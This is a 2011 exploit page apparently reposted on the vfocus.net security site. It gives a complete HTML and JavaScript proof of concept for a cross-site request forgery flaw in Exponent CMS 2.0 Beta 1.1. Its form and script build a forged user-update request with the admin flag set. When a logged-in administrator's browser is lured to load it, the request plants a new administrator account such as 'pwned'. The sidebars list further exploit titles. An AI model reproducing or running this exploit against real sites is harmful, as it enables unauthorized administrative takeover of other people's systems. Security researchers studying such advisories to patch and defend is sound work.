首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Exponent CMS 2.0 Beta 1.1 CSRF Add Administrator Account PoC
来源:vfocus.net 作者:outlaw.dll 发布时间:2011-05-04  

<!--
 
[+] Title: Exponent CMS 2.0 Beta 1.1 CSRF Add Administrator Account PoC
[+] Version: 2.0 Beta 1.1 (not tested with older versions)
[+] Note: No need administrator to be logged (:
[+] Tested on: Linux Ubuntu 11.04 (Google Chrome) but will work in any other OS
[+] Download URL: https://github.com/downloads/exponentcms/exponent-cms/exponent-2.0.0-beta1.1.zip
[+] Date: 02.05.2011
[+] Author: outlaw.dll

GreetZ to all bitcheZ in the world! =P
W_o.O_W
 
-->
<html>
    <head>
        <title>Exponent CMS 2.0 Beta 1.1 CSRF Add Administrator Account PoC by outlaw.dll</title>
        <style type="text/css">
        body, table, tr, td
        {
            background-color: #00489C;
            font-family: Verdana;
            font-size: 16px;
            color: #FFFFFF;
        }
        </style>
    </head>
    <body>
        <pre>
              .-""""-.       .-""""-.            
             /        \     /        \
            /_        _\   /_        _\
           // \      / \\ // \      / \\
           |\__\    /__/| |\__\    /__/|
            \    ||    /   \    ||    /
             \        /     \        /
              \  __  /       \  __  /
      .-""""-. '.__.'.-""""-. '.__.'.-""""-.
     /        \ |  |/        \ |  |/        \
    /_        _\|  /_        _\|  /_        _\
   // \      / \\ // \      / \\ // \      / \\
   |\__\    /__/| |\__\    /__/| |\__\    /__/|
    \    ||    /   \    ||    /   \    ||    /
     \        /     \        /     \        /
      \  __  /       \  __  /       \  __  /
       '.__.'         '.__.'         '.__.'
        |  |           |  |           |  |
        |  |           |  |           |  | 
        </pre>
        Exponent CMS 2.0 Beta 1.1 CSRF Add Administrator Account PoC by outlaw.dll
        <br /><br />
        <form name="exploit">
            <table border="0">
                <tr>
                    <td width="150" align="right">Target URL:</td>
                    <td width="400"><input type="text" name="targetURL" value="http://localhost/exponent/index.php" size="30" /></td>
                </tr>
                <tr>
                    <td width="150" align="right">Username:</td>
                    <td width="400"><input type="text" name="username" value="pwned" size="30" /></td>
                </tr>
                <tr>
                    <td width="150" align="right">Password:</td>
                    <td width="400"><input type="text" name="password" value="1337" size="30" /></td>
                </tr>
                <tr>
                    <td width="150" align="right">E-M@il:</td>
                    <td width="400"><input type="text" name="email" value="root@pwned.cx" size="30" /></td>
                </tr>
                <tr>
                    <td width="150" align="right">First Name:</td>
                    <td width="400"><input type="text" name="firstname" value="Greatest" size="30" /></td>
                </tr>
                <tr>
                    <td width="150" align="right">Last Name:</td>
                    <td width="400"><input type="text" name="lastname" value="Ever" size="30" /></td>
                </tr>
                <tr>
                    <td width="150" align="right">Admin Permissions:</td>
                    <td width="400"><input type="checkbox" name="isAdmin" checked="yes" value="1" /></td>
                </tr>
                <tr>
                    <td width="150"></td>
                    <td width="400"><input type="button" value="Pwn It!" onClick="runExploit()" /></td>
                </tr>
            </table>
        </form>
        <script type="text/javascript">
            function runExploit()
            {
                var targetURL = exploit.targetURL.value;
                var username = exploit.username.value;
                var password = exploit.password.value;
                var email = exploit.email.value;
                var firstname = exploit.firstname.value;
                var lastname = exploit.lastname.value;
                var isAdmin = exploit.isAdmin.value;
               
                if (targetURL != "" && username != "" && password != "" && email != "" && firstname != "" && lastname != "" && isAdmin != "")
                {
                    var exploitURL = targetURL + "?module=users&action=update&username="+username+"&pass1="+password+"&pass2="+password+"&email="+email+"&firstname="+firstname+"&lastname="+lastname+"&is_acting_admin="+isAdmin;
                    location.replace(exploitURL);
                }
                else
                {
                    alert("Error! Empty form fields.");
                }
            }
        </script>
    </body>
</html>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ICONICS WebHMI ActiveX Stack O
·Multiple Vendors libc/glob(3)
·OpenMyZip V0.1 .ZIP File Buffe
·MJM QuickPlayer 1.00 beta 60a
·MJM Core Player 2011 .s3m Stac
·Microsoft Office Excel Axis Pr
·Subtitle Processor 7.7.1 .M3U
·OSX/Intel reverse_tcp shell x8
·NetOp Remote Control 8.0, 9.1,
·libmodplug <= 0.8.8.2 .abc Sta
·SPlayer <= 3.7 (build 2055) Bu
·EMC HomeBase Server Directory
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved